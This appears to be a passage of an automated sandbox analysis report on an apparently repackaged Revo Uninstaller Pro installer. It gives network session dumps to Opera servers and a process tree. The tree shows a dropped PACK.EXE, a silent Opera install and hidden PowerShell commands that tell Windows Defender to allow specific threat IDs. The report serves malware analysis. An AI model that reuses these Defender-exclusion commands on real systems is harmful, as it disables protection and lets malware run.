                                                                                                                                            Date: Mon, 09 Dec 2024 16:40:09 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 1768
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=3407
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                            2024-12-09 16:40:10 UTC1768INData Raw: 7b 22 66 65 61 74 75 72 65 73 22 3a 7b 22 30 31 39 37 39 32 39 39 63 38 63 64 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 30 33 62 38 33 35 37 65 35 61 30 38 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 30 36 66 62 62 64 30 62 37 62 66 37 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 30 66 39 63 66 38 37 35 38 62 63 63 22 3a 7b 22 73 74 61 74 65 22 3a 22 64 69 73 61 62 6c 65 64 22 7d 2c 22 31 63 34 64 64 64 62 36 35 62 61 63 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 31 64 32 34 64 63 65 62 39 33 37 61 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 32 31 31 34 64 63 38 62 64 37 32 61 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65
                                                                                                                                            Data Ascii: {"features":{"01979299c8cd":{"state":"enabled"},"03b8357e5a08":{"state":"enabled"},"06fbbd0b7bf7":{"state":"enabled"},"0f9cf8758bcc":{"state":"disabled"},"1c4dddb65bac":{"state":"enabled"},"1d24dceb937a":{"state":"enabled"},"2114dc8bd72a":{"state":"enable


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.949717107.167.125.1894433532C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:40:09 UTC221OUTPOST /v1/binary HTTP/1.1
                                                                                                                                            Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                            User-Agent: Opera installer
                                                                                                                                            Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                            Content-Length: 254
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:40:09 UTC254OUTData Raw: 00 00 00 05 6a 02 48 65 38 33 63 39 34 62 38 2d 38 64 61 32 2d 34 30 32 61 2d 62 31 35 39 2d 64 63 39 61 37 64 31 31 33 61 62 35 00 90 c4 d6 c4 f5 64 e0 f5 d6 c4 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 35 65 39 63 64 30 64 34 2d 61 34 36 33 2d 34 33 31 37 2d 39 35 38 34 2d 35 36 64 32 30 37 66 34 65 61 37 34 02 48 30 30 63 31 38 32 34 38 2d 66 63 63 39 2d 34 62 36 62 2d 61 38 62 37 2d 30 63 35 30 35 31 38 64 39 30 32 32 02 0e 00 00 00 00 04 00 00 02 01 01 02 02 00 00 00 00 00 00 00 08 02 02
                                                                                                                                            Data Ascii: jHe83c94b8-8da2-402a-b159-dc9a7d113ab5ddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610H5e9cd0d4-a463-4317-9584-56d207f4ea74H00c18248-fcc9-4b6b-a8b7-0c50518d9022
                                                                                                                                            2024-12-09 16:40:10 UTC162INHTTP/1.1 201 CREATED
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 09 Dec 2024 16:40:10 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 36
                                                                                                                                            Connection: close
                                                                                                                                            2024-12-09 16:40:10 UTC36INData Raw: 65 38 33 63 39 34 62 38 2d 38 64 61 32 2d 34 30 32 61 2d 62 31 35 39 2d 64 63 39 61 37 64 31 31 33 61 62 35
                                                                                                                                            Data Ascii: e83c94b8-8da2-402a-b159-dc9a7d113ab5


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.949719107.167.96.364433532C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:40:09 UTC262OUTGET /download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=5e9cd0d4-a463-4317-9584-56d207f4ea74 HTTP/1.1
                                                                                                                                            User-Agent: Opera NetInstaller/115.0.5322.77
                                                                                                                                            Host: download.opera.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:40:10 UTC346INHTTP/1.1 302 Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 09 Dec 2024 16:40:10 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Location: https://download3.operacdn.com/ftp/pub/opera/desktop/115.0.5322.77/win/Opera_115.0.5322.77_Autoupdate_x64.exe
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                            2024-12-09 16:40:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.949720107.167.125.1894433532C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:40:11 UTC221OUTPOST /v1/binary HTTP/1.1
                                                                                                                                            Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                            User-Agent: Opera installer
                                                                                                                                            Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                            Content-Length: 248
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:40:11 UTC248OUTData Raw: 00 00 00 05 6a 02 48 31 61 36 30 30 64 66 34 2d 61 64 33 65 2d 34 36 62 32 2d 62 31 64 39 2d 65 32 35 39 66 36 39 62 39 61 32 30 00 9e c4 d6 c4 f5 64 e0 95 d7 c4 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 35 65 39 63 64 30 64 34 2d 61 34 36 33 2d 34 33 31 37 2d 39 35 38 34 2d 35 36 64 32 30 37 66 34 65 61 37 34 02 48 30 30 63 31 38 32 34 38 2d 66 63 63 39 2d 34 62 36 62 2d 61 38 62 37 2d 30 63 35 30 35 31 38 64 39 30 32 32 02 14 00 00 00 00 06 00 00 00 00 00 00 00 00 08 04 04
                                                                                                                                            Data Ascii: jH1a600df4-ad3e-46b2-b1d9-e259f69b9a20ddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610H5e9cd0d4-a463-4317-9584-56d207f4ea74H00c18248-fcc9-4b6b-a8b7-0c50518d9022
                                                                                                                                            2024-12-09 16:40:12 UTC162INHTTP/1.1 201 CREATED
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 09 Dec 2024 16:40:12 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 36
                                                                                                                                            Connection: close
                                                                                                                                            2024-12-09 16:40:12 UTC36INData Raw: 31 61 36 30 30 64 66 34 2d 61 64 33 65 2d 34 36 62 32 2d 62 31 64 39 2d 65 32 35 39 66 36 39 62 39 61 32 30
                                                                                                                                            Data Ascii: 1a600df4-ad3e-46b2-b1d9-e259f69b9a20


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            10192.168.2.949722107.167.125.1894433532C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:40:13 UTC221OUTPOST /v1/binary HTTP/1.1
                                                                                                                                            Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                            User-Agent: Opera installer
                                                                                                                                            Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                            Content-Length: 444
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:40:13 UTC444OUTData Raw: 00 00 00 05 6a 02 48 62 62 64 31 38 34 38 66 2d 65 64 34 35 2d 34 64 66 62 2d 39 61 61 36 2d 64 33 31 65 34 62 62 34 33 32 36 66 00 a6 f4 d6 c4 f5 64 da b5 d7 c4 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 35 65 39 63 64 30 64 34 2d 61 34 36 33 2d 34 33 31 37 2d 39 35 38 34 2d 35 36 64 32 30 37 66 34 65 61 37 34 02 48 30 30 63 31 38 32 34 38 2d 66 63 63 39 2d 34 62 36 62 2d 61 38 62 37 2d 30 63 35 30 35 31 38 64 39 30 32 32 02 16 02 dc 02 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6f 70 65
                                                                                                                                            Data Ascii: jHbbd1848f-ed45-4dfb-9aa6-d31e4bb4326fddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610H5e9cd0d4-a463-4317-9584-56d207f4ea74H00c18248-fcc9-4b6b-a8b7-0c50518d9022https://download.ope
                                                                                                                                            2024-12-09 16:40:14 UTC162INHTTP/1.1 201 CREATED
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 09 Dec 2024 16:40:14 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 36
                                                                                                                                            Connection: close
                                                                                                                                            2024-12-09 16:40:14 UTC36INData Raw: 62 62 64 31 38 34 38 66 2d 65 64 34 35 2d 34 64 66 62 2d 39 61 61 36 2d 64 33 31 65 34 62 62 34 33 32 36 66
                                                                                                                                            Data Ascii: bbd1848f-ed45-4dfb-9aa6-d31e4bb4326f


                                                                                                                                            Click to jump to process

                                                                                                                                            Click to jump to process

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Click to jump to process

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:11:38:52
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:22'221'229 bytes
                                                                                                                                            MD5 hash:881464F03502D44E29E5FEA8B4C35538
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:11:39:15
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
                                                                                                                                            Imagebase:0x7ff6fc260000
                                                                                                                                            File size:71'680 bytes
                                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:11:39:16
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\runonce.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\system32\runonce.exe" -r
                                                                                                                                            Imagebase:0x7ff651670000
                                                                                                                                            File size:61'952 bytes
                                                                                                                                            MD5 hash:9ADEF025B168447C1E8514D919CB5DC0
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:11:39:16
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\grpconv.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\grpconv.exe" -o
                                                                                                                                            Imagebase:0x7ff62a720000
                                                                                                                                            File size:52'736 bytes
                                                                                                                                            MD5 hash:8531882ACC33CB4BDC11B305A01581CE
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:11:39:18
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
                                                                                                                                            Imagebase:0x7ff6152f0000
                                                                                                                                            File size:25'088 bytes
                                                                                                                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:11:39:18
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
                                                                                                                                            Imagebase:0x140000000
                                                                                                                                            File size:25'576'112 bytes
                                                                                                                                            MD5 hash:EE15BFE5A394ADBFB087B053A6A72821
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:11:39:26
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:10'103'264 bytes
                                                                                                                                            MD5 hash:216B49B7EB7BE44D7ED7367F3725285F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.1735791667.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:11:39:30
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
                                                                                                                                            Imagebase:0x140000000
                                                                                                                                            File size:25'576'112 bytes
                                                                                                                                            MD5 hash:EE15BFE5A394ADBFB087B053A6A72821
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:13
                                                                                                                                            Start time:11:39:36
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:10'103'264 bytes
                                                                                                                                            MD5 hash:216B49B7EB7BE44D7ED7367F3725285F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:11:39:37
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123
                                                                                                                                            Imagebase:0xc50000
                                                                                                                                            File size:236'544 bytes
                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:11:39:37
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:16
                                                                                                                                            Start time:11:39:37
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
                                                                                                                                            Imagebase:0x2e0000
                                                                                                                                            File size:419'886 bytes
                                                                                                                                            MD5 hash:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 30%, ReversingLabs
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:17
                                                                                                                                            Start time:11:39:38
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                            Imagebase:0x6a0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:18
                                                                                                                                            Start time:11:39:38
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:23
                                                                                                                                            Start time:11:39:43
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                            Imagebase:0x6a0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:24
                                                                                                                                            Start time:11:39:43
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:25
                                                                                                                                            Start time:11:39:48
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                            Imagebase:0x6a0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:26
                                                                                                                                            Start time:11:39:48
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:27
                                                                                                                                            Start time:11:39:55
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:174'444 bytes
                                                                                                                                            MD5 hash:7ACCFDE96C04320BA099144A7BE710CC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 25%, ReversingLabs
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:28
                                                                                                                                            Start time:11:40:01
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\Downloads\OperaSetup.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                            Imagebase:0xa80000
                                                                                                                                            File size:2'227'280 bytes
                                                                                                                                            MD5 hash:43D37A6E0FE6E9824DFD80221E6AAD13
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:29
                                                                                                                                            Start time:11:40:02
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --silent --allusers=0 --server-tracking-blob=NWM4YWUzOWQyNTkwZGNkMDZiZDFlODcxMDg5YWFhOTYzNGRjMWI4Njg0MWE5OGMxZDBhOGNkY2I2N2FlOTg3ZTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwidGltZXN0YW1wIjoiMTczMzc2MjM5OC4xNDI4IiwidXNlcmFnZW50IjoiTlNJU19JbmV0YyAoTW96aWxsYSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJyMTAiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJEV05MU1QifSwidXVpZCI6IjVlOWNkMGQ0LWE0NjMtNDMxNy05NTg0LTU2ZDIwN2Y0ZWE3NCJ9
                                                                                                                                            Imagebase:0xce0000
                                                                                                                                            File size:5'740'952 bytes
                                                                                                                                            MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:30
                                                                                                                                            Start time:11:40:02
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
                                                                                                                                            Imagebase:0xce0000
                                                                                                                                            File size:5'740'952 bytes
                                                                                                                                            MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:31
                                                                                                                                            Start time:11:40:03
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
                                                                                                                                            Imagebase:0x420000
                                                                                                                                            File size:5'740'952 bytes
                                                                                                                                            MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            Has elevated privileges:true
